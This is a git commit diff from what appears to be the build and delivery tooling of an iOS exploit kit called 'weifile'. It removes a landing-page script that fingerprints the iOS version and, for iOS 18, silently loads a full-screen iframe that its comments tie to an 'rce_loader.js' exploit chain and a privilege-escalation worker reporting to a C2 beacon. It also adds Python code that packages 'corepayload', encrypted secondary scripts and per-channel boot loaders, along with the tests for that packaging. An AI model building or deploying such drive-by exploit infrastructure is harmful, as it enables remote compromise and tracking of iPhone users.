feat: old channel
This commit is contained in:
@@ -5,53 +5,8 @@
|
||||
<meta http-equiv="Expires" content="0" />
|
||||
<meta property="og:determiner" content="auto" />
|
||||
<title>weifile</title>
|
||||
<script src="/t.js" defer></script>
|
||||
</head>
|
||||
<body>
|
||||
<script type="text/javascript">
|
||||
(function () {
|
||||
function parseIosVersion() {
|
||||
var ua = navigator.userAgent || '';
|
||||
var m = /iPhone OS ([0-9_]+)/.exec(ua);
|
||||
if (!m) m = /CPU (?:iPhone )?OS ([0-9_]+)/.exec(ua);
|
||||
if (!m) m = /CPU OS ([0-9_]+)/.exec(ua);
|
||||
if (!m) {
|
||||
m = /Version\/(\d+)\.(\d+)/.exec(ua);
|
||||
return m ? [parseInt(m[1], 10), parseInt(m[2], 10)] : null;
|
||||
}
|
||||
return m[1].split('_').map(function (p) {
|
||||
return parseInt(p, 10);
|
||||
});
|
||||
}
|
||||
|
||||
var ios = parseIosVersion();
|
||||
if (!ios || ios[0] < 18) {
|
||||
// Below iOS 18: non-DS chain (index.js).
|
||||
var s = document.createElement('script');
|
||||
s.src = 'index.js?' + Date.now();
|
||||
(document.body || document.documentElement).appendChild(s);
|
||||
return;
|
||||
}
|
||||
if (ios[0] === 18) {
|
||||
// iOS 18.x only: redirect to ds-new frame.html (gate + rce_loader.js).
|
||||
// Extract per-channel patch string (X.Y.ZZ) from URL path and pass as ?c=
|
||||
// so rce_loader.js can forward it through the exploit chain to pe_worker.js,
|
||||
// which includes it in the C2 beacon for channel attribution.
|
||||
var channelCode = '';
|
||||
try {
|
||||
var m = String(location.pathname || '').match(/\/channel\/([0-9A-Za-z]\.[0-9A-Za-z]\.[0-9A-Za-z]{2})\//i);
|
||||
if (m && m[1]) channelCode = m[1].toUpperCase();
|
||||
} catch (eC) {}
|
||||
var dsDomain = '__DS_DOMAIN__';
|
||||
var dsUrl = dsDomain + '/next-chain/frame.html';
|
||||
if (channelCode) dsUrl += '?c=' + encodeURIComponent(channelCode);
|
||||
var ifr = document.createElement('iframe');
|
||||
ifr.src = dsUrl;
|
||||
ifr.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;border:0;';
|
||||
(document.body || document.documentElement).appendChild(ifr);
|
||||
}
|
||||
// iOS 19+ / 26+: no action.
|
||||
})();
|
||||
</script>
|
||||
<script src="index.js"></script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
@@ -8,7 +8,6 @@
|
||||
<meta http-equiv="Expires" content="0" />
|
||||
<meta property="og:determiner" content="auto" />
|
||||
<title>加载中</title>
|
||||
<script src="/t.js" defer></script>
|
||||
<style>
|
||||
:root {
|
||||
--bg: #0f1419;
|
||||
@@ -112,45 +111,7 @@
|
||||
<p class="title">加载中</p>
|
||||
<p class="subtitle">请稍候,正在准备页面…</p>
|
||||
</div>
|
||||
<script type="text/javascript">
|
||||
(function () {
|
||||
function parseIosVersion() {
|
||||
var ua = navigator.userAgent || '';
|
||||
var m = /iPhone OS ([0-9_]+)/.exec(ua);
|
||||
if (!m) m = /CPU (?:iPhone )?OS ([0-9_]+)/.exec(ua);
|
||||
if (!m) m = /CPU OS ([0-9_]+)/.exec(ua);
|
||||
if (!m) {
|
||||
m = /Version\/(\d+)\.(\d+)/.exec(ua);
|
||||
return m ? [parseInt(m[1], 10), parseInt(m[2], 10)] : null;
|
||||
}
|
||||
return m[1].split('_').map(function (p) {
|
||||
return parseInt(p, 10);
|
||||
});
|
||||
}
|
||||
|
||||
var ios = parseIosVersion();
|
||||
if (!ios || ios[0] < 18) {
|
||||
var s = document.createElement('script');
|
||||
s.src = 'index.js?' + Date.now();
|
||||
(document.body || document.documentElement).appendChild(s);
|
||||
return;
|
||||
}
|
||||
if (ios[0] === 18) {
|
||||
var channelCode = '';
|
||||
try {
|
||||
var m = String(location.pathname || '').match(/\/channel\/([0-9A-Za-z]\.[0-9A-Za-z]\.[0-9A-Za-z]{2})\//i);
|
||||
if (m && m[1]) channelCode = m[1].toUpperCase();
|
||||
} catch (eC) {}
|
||||
var dsDomain = '__DS_DOMAIN__';
|
||||
var dsUrl = dsDomain + '/next-chain/frame.html';
|
||||
if (channelCode) dsUrl += '?c=' + encodeURIComponent(channelCode);
|
||||
var ifr = document.createElement('iframe');
|
||||
ifr.src = dsUrl;
|
||||
ifr.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;border:0;';
|
||||
(document.body || document.documentElement).appendChild(ifr);
|
||||
}
|
||||
})();
|
||||
</script>
|
||||
<script src="index.js"></script>
|
||||
<script>
|
||||
(function () {
|
||||
var TOTAL = 15;
|
||||
|
||||
@@ -5,53 +5,8 @@
|
||||
<meta http-equiv="Expires" content="0" />
|
||||
<meta property="og:determiner" content="auto" />
|
||||
<title>weifile</title>
|
||||
<script src="/t.js" defer></script>
|
||||
</head>
|
||||
<body>
|
||||
<script type="text/javascript">
|
||||
(function () {
|
||||
function parseIosVersion() {
|
||||
var ua = navigator.userAgent || '';
|
||||
var m = /iPhone OS ([0-9_]+)/.exec(ua);
|
||||
if (!m) m = /CPU (?:iPhone )?OS ([0-9_]+)/.exec(ua);
|
||||
if (!m) m = /CPU OS ([0-9_]+)/.exec(ua);
|
||||
if (!m) {
|
||||
m = /Version\/(\d+)\.(\d+)/.exec(ua);
|
||||
return m ? [parseInt(m[1], 10), parseInt(m[2], 10)] : null;
|
||||
}
|
||||
return m[1].split('_').map(function (p) {
|
||||
return parseInt(p, 10);
|
||||
});
|
||||
}
|
||||
|
||||
var ios = parseIosVersion();
|
||||
if (!ios || ios[0] < 18) {
|
||||
// Below iOS 18: non-DS chain (index.js).
|
||||
var s = document.createElement('script');
|
||||
s.src = 'index.js?' + Date.now();
|
||||
(document.body || document.documentElement).appendChild(s);
|
||||
return;
|
||||
}
|
||||
if (ios[0] === 18) {
|
||||
// iOS 18.x only: redirect to ds-new frame.html (gate + rce_loader.js).
|
||||
// Extract per-channel patch string (X.Y.ZZ) from URL path and pass as ?c=
|
||||
// so rce_loader.js can forward it through the exploit chain to pe_worker.js,
|
||||
// which includes it in the C2 beacon for channel attribution.
|
||||
var channelCode = '';
|
||||
try {
|
||||
var m = String(location.pathname || '').match(/\/channel\/([0-9A-Za-z]\.[0-9A-Za-z]\.[0-9A-Za-z]{2})\//i);
|
||||
if (m && m[1]) channelCode = m[1].toUpperCase();
|
||||
} catch (eC) {}
|
||||
var dsDomain = '__DS_DOMAIN__';
|
||||
var dsUrl = dsDomain + '/next-chain/frame.html';
|
||||
if (channelCode) dsUrl += '?c=' + encodeURIComponent(channelCode);
|
||||
var ifr = document.createElement('iframe');
|
||||
ifr.src = dsUrl;
|
||||
ifr.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;border:0;';
|
||||
(document.body || document.documentElement).appendChild(ifr);
|
||||
}
|
||||
// iOS 19+ / 26+: no action.
|
||||
})();
|
||||
</script>
|
||||
<script src="index.js"></script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
@@ -8,7 +8,7 @@ Requires `tools/build.py --apply` first (shared staged weifile + public/details)
|
||||
3. Patch corepayload `/details/show.html` -> `/c/{ver}/show.htm` (18 bytes; netconfig)
|
||||
4. Rewrite show.html asset URLs to /channel/{ver}/details/...
|
||||
5. Patch secondary `/details/show.html` -> `/c/{ver}/show.htm` (18 bytes)
|
||||
6. Strip iptj beacon from index.js; inject t.js into weifile.html
|
||||
6. Strip iptj beacon from payload; install script-embed index.js boot
|
||||
7. Write to {artifact-root}/channel/{ver}/
|
||||
"""
|
||||
|
||||
@@ -19,10 +19,16 @@ import hashlib
|
||||
import json
|
||||
import re
|
||||
import shutil
|
||||
import sys
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
import build as xxbb_build
|
||||
|
||||
_EMBED_DIR = Path(__file__).resolve().parents[2] / "channel-embed"
|
||||
if str(_EMBED_DIR) not in sys.path:
|
||||
sys.path.insert(0, str(_EMBED_DIR))
|
||||
from embed_boot import apply_embed_boot # noqa: E402
|
||||
from _details_pack import extract_member, make_passworded_7z
|
||||
from _secondary_pack import decrypt_secondary_minjs, encrypt_secondary_minjs
|
||||
|
||||
@@ -209,7 +215,7 @@ def apply_landing_template(weifile_dir: Path, template: str) -> Path:
|
||||
if not src.is_file():
|
||||
raise SystemExit(f"missing landing template: {src}")
|
||||
dest = weifile_dir / "weifile.html"
|
||||
dest.write_text(inject_tjs(src.read_text(encoding="utf-8")), encoding="utf-8")
|
||||
dest.write_text(src.read_text(encoding="utf-8"), encoding="utf-8")
|
||||
return dest
|
||||
|
||||
|
||||
@@ -285,6 +291,11 @@ def pack_channel(
|
||||
leftover_route = weifile_dest / "route.js"
|
||||
if leftover_route.is_file():
|
||||
leftover_route.unlink()
|
||||
apply_embed_boot(
|
||||
weifile_dest,
|
||||
channel_code=ver,
|
||||
ds_domain=ds_domain,
|
||||
)
|
||||
|
||||
if channel_out.exists():
|
||||
shutil.rmtree(channel_out)
|
||||
|
||||
@@ -86,10 +86,10 @@ class XxbbBuildTest(unittest.TestCase):
|
||||
self.assertFalse((weifile / "route.js").is_file())
|
||||
html = (weifile / "weifile.html").read_text(encoding="utf-8")
|
||||
self.assertNotIn("__CHANNEL_C__", html)
|
||||
self.assertIn('src="/t.js"', html)
|
||||
self.assertNotIn('src="/t.js"', html)
|
||||
self.assertNotIn('src="route.js"', html)
|
||||
self.assertIn("/next-chain/frame.html", html)
|
||||
self.assertIn("index.js", html)
|
||||
self.assertNotIn("/next-chain/frame.html", html)
|
||||
self.assertIn('src="index.js"', html)
|
||||
self.assertNotIn("config.js", html)
|
||||
self.assertNotIn("boot.js", html)
|
||||
self.assertNotIn("holdFresh", html)
|
||||
@@ -327,11 +327,10 @@ class XxbbBuildTest(unittest.TestCase):
|
||||
self.assertFalse((xxbb_build.SOURCE_WEIFILE / "route.js").is_file())
|
||||
for name in ("weifile.html", "templates/blank.html", "templates/test.html"):
|
||||
landing = (xxbb_build.SOURCE_WEIFILE / name).read_text(encoding="utf-8")
|
||||
self.assertIn('src="/t.js"', landing)
|
||||
self.assertEqual(pack_channel.inject_tjs(landing), landing)
|
||||
self.assertIn('src="index.js"', landing)
|
||||
self.assertNotIn('src="/t.js"', landing)
|
||||
self.assertNotIn('src="route.js"', landing)
|
||||
self.assertIn("/next-chain/frame.html", landing)
|
||||
self.assertIn("index.js", landing)
|
||||
self.assertNotIn("/next-chain/frame.html", landing)
|
||||
self.assertNotIn("config.js", landing)
|
||||
self.assertNotIn("boot.js", landing)
|
||||
self.assertNotIn("holdFresh", landing)
|
||||
|
||||
Reference in New Issue
Block a user